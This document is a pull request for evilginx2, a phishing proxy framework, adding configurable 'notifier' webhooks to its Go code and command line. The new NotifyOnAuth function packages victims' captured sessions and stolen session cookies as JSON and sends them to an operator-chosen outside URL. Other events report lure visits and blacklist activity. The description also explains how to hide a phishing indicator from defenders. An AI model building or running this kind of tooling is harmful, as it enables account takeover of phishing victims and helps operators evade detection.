### PR TITLE
New feature: notifiers

### DIFF
--- a/core/notifier.go
+++ b/core/notifier.go
@@ -1,0 +1,206 @@
+package core
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/url"
+	"time"
+
+	"github.com/kgretzky/evilginx2/database"
+)
+
+type Unauthorized struct {
+	Phishlet    string `json:"phishlet"`
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type UnauthorizedUserAgent struct {
+	Phishlet    string `json:"phishlet"`
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type BlacklistAddAll struct {
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type BlacklistAddUnauth struct {
+	Phishlet    string `json:"phishlet"`
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type BlacklistVisit struct {
+	Req_url     string `json:"req_url"`
+	Useragent   string `json:"useragent"`
+	Remote_addr string `json:"remote_addr"`
+}
+
+type Visitor struct {
+	Session database.Session
+	Tokens  string `json:"tokens"`
+}
+
+// sets up a http.Request with correct Method.
+func NotifyReturnReq(n *Notify, body interface{}) (req http.Request, err error) {
+	if n.Method == "GET" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodGet, n.Url, bytes.NewBuffer(Body))
+
+		return *req, err
+	}
+	if n.Method == "POST" {
+		Body, _ := json.Marshal(body)
+		req, err := http.NewRequest(http.MethodPost, n.Url, bytes.NewBuffer(Body))
+
+		req.Header.Add("Content-Type", "application/json")
+		return *req, err
+	}
+	return req, err
+}
+
+// configures and sends the http.Request
+func NotifierSend(n *Notify, body interface{}) error {
+	req, err := NotifyReturnReq(n, body)
+	if err != nil {
+		return err
+	}
+
+	if n.AuthHeaderName != "" && n.AuthHeaderValue != "" {
+		req.Header.Add(n.AuthHeaderName, n.AuthHeaderValue)
+	}
+
+	if n.BasicAuthUser != "" && n.BasicAuthPassword != "" {
+		req.SetBasicAuth(n.BasicAuthUser, n.BasicAuthPassword)
+	}
+
+	client := &http.Client{Timeout: 10 * time.Second}
+	_, errreq := client.Do(&req)
+	if errreq != nil {
+		return errreq
+	}
+	return nil
+}
+
+// prepares the Body for unauthorized requests and triggers NotifierSend
+func NotifyOnUnauthorized(n *Notify, pl_name string, req_url string, useragent string, remote_addr string) error {
+	b := Unauthorized{
+		Phishlet:    pl_name,
+		Req_url:     req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+
+// prepares the Body for unauthorized_user_agent requests and triggers NotifierSend
+func NotifyOnUnauthorizedUserAgent(n *Notify, pl_name string, req_url string, useragent string, remote_addr string) error {
+	b := UnauthorizedUserAgent{
+		Phishlet:    pl_name,
+		Req_url:     req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for blacklist from 'all' mode requests and triggers NotifierSend
+func NotifyOnBlacklistAddAll(n *Notify, req_url string, useragent string, remote_addr string) error {
+	b := BlacklistAddAll{
+		Req_url:     req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for blacklist from 'Unauth' mode requests and triggers NotifierSend
+func NotifyOnBlacklistAddUnauth(n *Notify, pl_name string, req_url string, useragent string, remote_addr string) error {
+	b := BlacklistAddUnauth {
+		Phishlet:    pl_name,
+		Req_url:     req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+
+// prepares the Body for blacklist visit requests and triggers NotifierSend
+func NotifyOnBlacklistVisit(n *Notify, req_url string, useragent string, remote_addr string) error {
+	b := BlacklistVisit{
+		Req_url:     req_url,
+		Useragent:   useragent,
+		Remote_addr: remote_addr,
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for visitors and triggers NotifierSend
+func NotifyOnVisitor(n *Notify, session database.Session, url *url.URL) error {
+	s := session
+	b := Visitor{
+		Session: s,
+	}
+
+	query := url.Query()
+	if n.ForwardParam != "" && query[n.ForwardParam] != nil {
+		n.Url = fmt.Sprintf("%s/?%s=%s", n.Url, n.ForwardParam, query[n.ForwardParam][0])
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// prepares the Body for authorized requests and triggers NotifierSend
+func NotifyOnAuth(n *Notify, session database.Session, phishlet *Phishlet) error {
+	s := session
+	p := *phishlet
+	b := Visitor{
+		Session: s,
+		Tokens:  cookieTokensToJSON(&p, s.CookieTokens),
+	}
+
+	err := NotifierSend(n, b)
+	if err != nil {
+		return err
+	}
+	return nil
+}

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -122,6 +122,12 @@ func (t *Terminal) DoWork() {
 			if err != nil {
 				log.Error("config: %v", err)
 			}
+		case "notifiers":
+			cmd_ok = true
+			err := t.handleNotifiers(args[1:])
+			if err != nil {
+				log.Error("notifiers: %v", err)
+			}
 		case "proxy":
 			cmd_ok = true
 			err := t.handleProxy(args[1:])
@@ -429,7 +435,7 @@ func (t *Terminal) handleSessions(args []string) error {
 						log.Printf("[ %s ]\n%s\n", lgreen.Sprint("tokens"), AsRows(tkeys, tvals))
 					}
 					if len(s.CookieTokens) > 0 {
-						json_tokens := t.cookieTokensToJSON(pl, s.CookieTokens)
+						json_tokens := cookieTokensToJSON(pl, s.CookieTokens)
 						log.Printf("[ %s ]\n%s\n\n", lyellow.Sprint("cookies"), json_tokens)
 					}
 				}
@@ -633,6 +639,234 @@ func (t *Terminal) handlePhishlets(args []string) error {
 				t.cfg.SetSiteDisabled(args[1])
 				t.manageCertificates(false)
 			}
+			return nil
+		}
+	}
+	return fmt.Errorf("invalid syntax: %s", args)
+}
+
+func (t *Terminal) handleNotifiers(args []string) error {
+	higreen := color.New(color.FgHiGreen)
+	green := color.New(color.FgGreen)
+	//hired := color.New(color.FgHiRed)
+	hiblue := color.New(color.FgHiBlue)
+	yellow := color.New(color.FgYellow)
+	cyan := color.New(color.FgCyan)
+	hcyan := color.New(color.FgHiCyan)
+	white := color.New(color.FgHiWhite)
+
+	pn := len(args)
+	if pn == 0 {
+		// list all notifiers
+		t.output("%s", t.sprintNotifiers())
+		return nil
+	}
+	if pn > 0 {
+		switch args[0] {
+		case "create":
+			if pn == 4 {
+				_, err := url.ParseRequestURI(args[3])
+				if err != nil {
+					return fmt.Errorf("create: %v", err)
+				}
+				if t.cfg.IsValidNotifierOnEvent(args[1]) && t.cfg.IsValidNotifierMethod(args[2]) {
+					n := &Notify{
+						OnEvent: args[1],
+						Url:     args[3],
+						Method:  args[2],
+					}
+					t.cfg.AddNotifier(args[1], n)
+					log.Info("created notifier with ID: %d", len(t.cfg.notifiers)-1)
+					log.Info("disabled notifier with ID: %d", len(t.cfg.notifiers)-1)
+					return nil
+				}
+				return fmt.Errorf("create: invalid on_event: %s. use 'authenticated', 'visitor' or 'unauthorized', 'unauthorized_user_agent', 'blacklist_add' or 'blacklist_visit'", args[1])
+			}
+			return fmt.Errorf("create: incorrect number of arguments. run 'help notifiers'")
+		case "edit":
+			n_id, err := strconv.Atoi(strings.TrimSpace(args[1]))
+			if err != nil {
+				return fmt.Errorf("edit: %v", err)
+			}
+			n, err := t.cfg.GetNotifier(n_id)
+			if err != nil {
+				return fmt.Errorf("edit: %v", err)
+			}
+
+			do_update := false
+			if pn == 3 {
+				switch args[2] {
+				case "enable":
+					n.Enabled = true
+					do_update = true
+					log.Info("enabled = '%v'", n.Enabled)
+				case "disable":
+					n.Enabled = false
+					do_update = true
+					log.Info("enabled = '%v'", n.Enabled)
+				}
+			}
+			if pn == 4 {
+				val := args[3]
+
+				switch args[2] {
+				case "on_event":
+					if val != "" {
+						val = strings.ToLower(val)
+						if !t.cfg.IsValidNotifierOnEvent(val) {
+							return fmt.Errorf("edit: notifier on_event is not valid. use 'authenticated', 'visitor',  'unauthorized', 'unauthorized_user_agent', 'blacklist_add', 'blacklist_visit'")
+						}
+						n.OnEvent = val
+					} else {
+						n.OnEvent = ""
+					}
+					do_update = true
+					log.Info("on_event = '%s'", n.OnEvent)
+				case "url":
+					if val != "" {
+						_, err := url.ParseRequestURI(val)
+						if err != nil {
+							return err
+						}
+						n.Url = val
+					} else {
+						n.Url = ""
+					}
+					do_update = true
+					log.Info("url = '%s'", n.Url)
+				case "method":
+					if val != "" {
+						val = strings.ToUpper(val)
+						if !t.cfg.IsValidNotifierMethod(val) {
+							return fmt.Errorf("edit: notifier method is not valid. use 'POST' or 'GET'")
+						}
+						n.Method = val
+					} else {
+						n.Method = ""
+					}
+					do_update = true
+					log.Info("method = '%s'", n.Method)
+				case "auth_header_name":
+					if val != "" {
+						n.AuthHeaderName = val
+					} else {
+						n.AuthHeaderName = ""
+					}
+					do_update = true
+					log.Info("auth_header_name = '%s'", n.AuthHeaderName)
+				case "auth_header_value":
+					if val != "" {
+						n.AuthHeaderValue = val
+					} else {
+						n.AuthHeaderValue = ""
+					}
+					do_update = true
+					log.Info("auth_header_value = '%s'", n.AuthHeaderValue)
+				case "basic_auth_user":
+					if val != "" {
+						n.BasicAuthUser = val
+					} else {
+						n.BasicAuthUser = ""
+					}
+					do_update = true
+					log.Info("basic_auth_user = '%s'", n.BasicAuthUser)
+				case "basic_auth_password":
+					if val != "" {
+						n.BasicAuthPassword = val
+					} else {
+						n.BasicAuthPassword = ""
+					}
+					do_update = true
+					log.Info("basic_auth_password = '%s'", n.BasicAuthPassword)
+				case "forward_param":
+					if n.OnEvent == "visitor" {
+						if val != "" {
+							n.ForwardParam = val
+						} else {
+							n.ForwardParam = ""
+						}
+						do_update = true
+						log.Info("forward_param = '%s'", n.ForwardParam)
+					} else {
+						return fmt.Errorf("edit: ForwardParam is only implimented for the 'visitor' on_event")
+					}
+				}
+			}
+			if do_update {
+				err := t.cfg.SetNotifier(n_id, n)
+				if err != nil {
+					return fmt.Errorf("edit: %v", err)
+				}
+				return nil
+			}
+			return fmt.Errorf("edit: incorrect number of/or unknown arguments. run 'help notifiers'")
+		case "delete":
+			if pn == 2 {
+				if len(t.cfg.notifiers) == 0 {
+					break
+				}
+				if args[1] == "all" {
+					di := []int{}
+					for n, _ := range t.cfg.notifiers {
+						di = append(di, n)
+					}
+					if len(di) > 0 {
+						rdi := t.cfg.DeleteNotifier(di)
+						for _, id := range rdi {
+							log.Info("deleted notifier with ID: %d", id)
+						}
+					}
+					return nil
+				} else {
+					rc := strings.Split(args[1], ",")
+					di := []int{}
+					for _, pc := range rc {
+						pc = strings.TrimSpace(pc)
+						rd := strings.Split(pc, "-")
+						if len(rd) == 2 {
+							b_id, err := strconv.Atoi(strings.TrimSpace(rd[0]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							e_id, err := strconv.Atoi(strings.TrimSpace(rd[1]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							for i := b_id; i <= e_id; i++ {
+								di = append(di, i)
+							}
+						} else if len(rd) == 1 {
+							b_id, err := strconv.Atoi(strings.TrimSpace(rd[0]))
+							if err != nil {
+								return fmt.Errorf("delete: %v", err)
+							}
+							di = append(di, b_id)
+						}
+					}
+					if len(di) > 0 {
+						rdi := t.cfg.DeleteNotifier(di)
+						for _, id := range rdi {
+							log.Info("deleted lure with ID: %d", id)
+						}
+					}
+					return nil
+				}
+			}
+			return fmt.Errorf("incorrect number of arguments")
+		default:
+			n_id, err := strconv.Atoi(args[0])
+			if err != nil {
+				return err
+			}
+			n, err := t.cfg.GetNotifier(n_id)
+			if err != nil {
+				return err
+			}
+
+			keys := []string{"enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
+			vals := []string{hiblue.Sprint(n.Enabled), cyan.Sprint(n.OnEvent), hcyan.Sprint(n.Url), yellow.Sprint(n.Method), green.Sprint(n.AuthHeaderName), green.Sprint(n.AuthHeaderValue), higreen.Sprint(n.BasicAuthUser), higreen.Sprint(n.BasicAuthPassword), white.Sprint(n.ForwardParam)}
+			log.Printf("\n%s\n", AsRows(keys, vals))
+
 			return nil
 		}
 	}
@@ -1066,6 +1300,38 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("sessions", []string{"delete"}, "delete <id>", "delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)")
 	h.AddSubCommand("sessions", []string{"delete", "all"}, "delete all", "delete all logged sessions")
 
+	h.AddCommand("notifiers", "general", "manage notifier configuration", "Configures notifier that pushes information about session on specifc events.", LAYER_TOP,
+		readline.PcItem("notifiers",
+			readline.PcItem("create", readline.PcItemDynamic(t.notifierValidOnEvents, readline.PcItemDynamic(t.notifierValidateMethods))),
+			readline.PcItem("edit",
+				readline.PcItemDynamic(t.notifierIdPrefixCompleter,
+					readline.PcItem("enable"),
+					readline.PcItem("disable"),
+					readline.PcItem("on_event", readline.PcItemDynamic(t.notifierValidOnEvents)),
+					readline.PcItem("method", readline.PcItemDynamic(t.notifierValidateMethods)),
+					readline.PcItem("url"),
+					readline.PcItem("auth_header_name"),
+					readline.PcItem("auth_header_value"),
+					readline.PcItem("basic_auth_user"),
+					readline.PcItem("basic_auth_password"),
+					readline.PcItem("forward_param"))),
+			readline.PcItem("delete", readline.PcItem("all"))))
+	h.AddSubCommand("notifiers", nil, "", "show all configuration variables")
+	h.AddSubCommand("notifiers", nil, "<id>", "show details of a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"create"}, "create <on_event> <method> <url>", "creates new notifier for given <on_event> that is send to <url> using <method>")
+	h.AddSubCommand("notifiers", []string{"delete"}, "delete <id>", "deletes notifier with given <id>")
+	h.AddSubCommand("notifiers", []string{"delete", "all"}, "delete all", "deletes all created notifier")
+	h.AddSubCommand("notifiers", []string{"edit", "enable"}, "edit <id> enable", "enables notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "disable"}, "edit <id> enable", "disables notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "on_event"}, "edit <id> on_event <on_event>", "sets the event <on_event> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "url"}, "edit <id> url <url>", "sets the url <url> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "method"}, "edit <id> method <url>", "sets the method <method> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "auth_header_name"}, "edit <id> auth_header_name <auth_header_name>", "sets the auth_header_name <auth_header_name> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "auth_header_value"}, "edit <id> auth_header_value <auth_header_value>", "sets the auth_header_value <auth_header_value> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "basic_auth_user"}, "edit <id> basic_auth_user <basic_auth_user>", "sets the basic_auth_user <basic_auth_user> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "basic_auth_password"}, "edit <id> basic_auth_password <basic_auth_user>", "sets the basic_auth_password <basic_auth_user> for a notifier with a given <id>")
+	h.AddSubCommand("notifiers", []string{"edit", "forward_param"}, "edit <id> forward_param <forward_param>", "sets the forward_param <forward_param> for a notifier with a given <id>")
+
 	h.AddCommand("lures", "general", "manage lures for generation of phishing urls", "Shows all create lures and allows to edit or delete them.", LAYER_TOP,
 		readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
 			readline.PcItem("edit", readline.PcItemDynamic(t.luresIdPrefixCompleter, readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("ua_filter"), readline.PcItem("redirector", readline.PcItemDynamic(t.redirectorsPrefixCompleter)))),
@@ -1109,53 +1375,8 @@ func (t *Terminal) createHelp() {
 	t.hlp = h
 }
 
-func (t *Terminal) cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.CookieToken) string {
-	type Cookie struct {
-		Path           string `json:"path"`
-		Domain         string `json:"domain"`
-		ExpirationDate int64  `json:"expirationDate"`
-		Value          string `json:"value"`
-		Name           string `json:"name"`
-		HttpOnly       bool   `json:"httpOnly,omitempty"`
-		HostOnly       bool   `json:"hostOnly,omitempty"`
-	}
 
-	var cookies []*Cookie
-	for domain, tmap := range tokens {
-		for k, v := range tmap {
-			c := &Cookie{
-				Path:           v.Path,
-				Domain:         domain,
-				ExpirationDate: time.Now().Add(365 * 24 * time.Hour).Unix(),
-				Value:          v.Value,
-				Name:           k,
-				HttpOnly:       v.HttpOnly,
-			}
-			if domain[:1] == "." {
-				c.HostOnly = false
-				c.Domain = domain[1:]
-			} else {
-				c.HostOnly = true
-			}
-			if c.Path == "" {
-				c.Path = "/"
-			}
-			cookies = append(cookies, c)
-		}
-	}
 
-	json, _ := json.Marshal(cookies)
-	return string(json)
-}
-
-func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]string) string {
-	var ret string
-	white := color.New(color.FgHiWhite)
-	for k, v := range tokens {
-		ret += fmt.Sprintf("%s: %s\n", k, white.Sprint(v))
-	}
-	return ret
-}
 
 func (t *Terminal) checkStatus() {
 	if t.cfg.GetBaseDomain() == "" {
@@ -1260,6 +1481,24 @@ func (t *Terminal) sprintIsEnabled(enabled bool) string {
 	}
 }
 
+func (t *Terminal) sprintNotifiers() string {
+	higreen := color.New(color.FgHiGreen)
+	green := color.New(color.FgGreen)
+	//hired := color.New(color.FgHiRed)
+	hiblue := color.New(color.FgHiBlue)
+	yellow := color.New(color.FgYellow)
+	cyan := color.New(color.FgCyan)
+	hcyan := color.New(color.FgHiCyan)
+	white := color.New(color.FgHiWhite)
+	//n := 0
+	cols := []string{"id", "enabled", "on_event", "url", "method", "auth_header_name", "auth_header_value", "basic_auth_user", "basic_auth_password", "forward_param"}
+	var rows [][]string
+	for n, N := range t.cfg.notifiers {
+		rows = append(rows, []string{strconv.Itoa(n), hiblue.Sprint(N.Enabled), cyan.Sprint(N.OnEvent), hcyan.Sprint(N.Url), yellow.Sprint(N.Method), green.Sprint(N.AuthHeaderName), green.Sprint(N.AuthHeaderValue), higreen.Sprint(N.BasicAuthUser), higreen.Sprint(N.BasicAuthPassword), white.Sprint(N.ForwardParam)})
+	}
+	return AsTable(cols, rows)
+}
+
 func (t *Terminal) sprintLures() string {
 	higreen := color.New(color.FgHiGreen)
 	green := color.New(color.FgGreen)
@@ -1329,6 +1568,32 @@ func (t *Terminal) redirectorsPrefixCompleter(args string) []string {
 				ret = append(ret, name)
 			}
 		}
+	}
+	return ret
+}
+
+func (t *Terminal) notifierIdPrefixCompleter(args string) []string {
+	var ret []string
+	for n, _ := range t.cfg.notifiers {
+		ret = append(ret, strconv.Itoa(n))
+	}
+	return ret
+}
+
+func (t *Terminal) notifierValidOnEvents(args string) []string {
+	var ret []string
+	on_events := []string{"authenticated", "visitor", "unauthorized", "unauthorized_user_agent", "blacklist_add", "blacklist_visit"}
+	for _, e := range on_events {
+		ret = append(ret, e)
+	}
+	return ret
+}
+
+func (t *Terminal) notifierValidateMethods(args string) []string {
+	var ret []string
+	on_events := []string{"GET", "POST"}
+	for _, e := range on_events {
+		ret = append(ret, e)
 	}
 	return ret
 }

--- a/core/utils.go
+++ b/core/utils.go
@@ -3,10 +3,14 @@ package core
 import (
 	"crypto/rand"
 	"crypto/sha256"
+	"encoding/json"
 	"fmt"
 	"io/fs"
 	"io/ioutil"
 	"os"
+	"time"
+
+	"github.com/kgretzky/evilginx2/database"
 )
 
 func GenRandomToken() string {
@@ -47,6 +51,45 @@ func CreateDir(path string, perm os.FileMode) error {
 		}
 	}
 	return nil
+}
+
+func cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.CookieToken) string {
+	type Cookie struct {
+		Path           string `json:"path"`
+		Domain         string `json:"domain"`
+		ExpirationDate int64  `json:"expirationDate"`
+		Value          string `json:"value"`
+		Name           string `json:"name"`
+		HttpOnly       bool   `json:"httpOnly,omitempty"`
+		HostOnly       bool   `json:"hostOnly,omitempty"`
+	}
+
+	var cookies []*Cookie
+	for domain, tmap := range tokens {
+		for k, v := range tmap {
+			c := &Cookie{
+				Path:           v.Path,
+				Domain:         domain,
+				ExpirationDate: time.Now().Add(365 * 24 * time.Hour).Unix(),
+				Value:          v.Value,
+				Name:           k,
+				HttpOnly:       v.HttpOnly,
+			}
+			if domain[:1] == "." {
+				c.HostOnly = false
+				c.Domain = domain[1:]
+			} else {
+				c.HostOnly = true
+			}
+			if c.Path == "" {
+				c.Path = "/"
+			}
+			cookies = append(cookies, c)
+		}
+	}
+
+	json, _ := json.Marshal(cookies)
+	return string(json)
 }
 
 func ReadFromFile(path string) ([]byte, error) {

--- a/database/database.go
+++ b/database/database.go
@@ -69,6 +69,14 @@ func (d *Database) SetSessionCookieTokens(sid string, tokens map[string]map[stri
 	return err
 }
 
+func (d *Database) GetSessionBySid(sid string) (*Session, error) {
+	s, err := d.sessionsGetBySid(sid)
+	if err != nil {
+		return nil,err
+	}
+	return s, err
+}
+
 func (d *Database) DeleteSession(sid string) error {
 	s, err := d.sessionsGetBySid(sid)
 	if err != nil {


### PR DESCRIPTION
Adds 'notifiers' to evilginx2. This enables you to setup notification on specific events:
- Lure visitor (people who used a correct lure url)
- Unauthorized visitor (people/bots that used a non lure url)
- Authenticated user (people who authenticated against your lure)
- unauthorized_user_agent (if ua_filter is set in lure)
- blacklist_add (whenever a IP is added to the backlist)
- blacklist_visit (whenever a blacklisted IP connects to evilginx)

Notifiers allow you to send webhooks (GET or POST requests). POST requests forward all the important information about the event in JSON to the specified URL. 

GET requests are intended to be used with forward_param. This allows you to forward a http parameter the original user used. This for example allows for integration with gophish and the ability to hide the RID ioc very easily as a random parameter (without the need for nginx or editing sourcecode). This is purely based of the functionality added by @Cgboal in https://github.com/kgretzky/evilginx2/pull/578 but reworked to function as a configurable notifier.

In the example below n8n is used to act as glue between evilginx2 and API's. Here I configured n8n to parse the incoming data and forward it to mattermost, gotify and gophish.
https://www.youtube.com/watch?v=FWlm-dzEM7I

The docker project used in that video can be found here, https://github.com/justin-p/docker-n8n-playground

**EDIT 11-08-2023**
n8n playground is currently out of date by changes made by n8n, in addtion to the fact this PR has now been updated for evilginx3.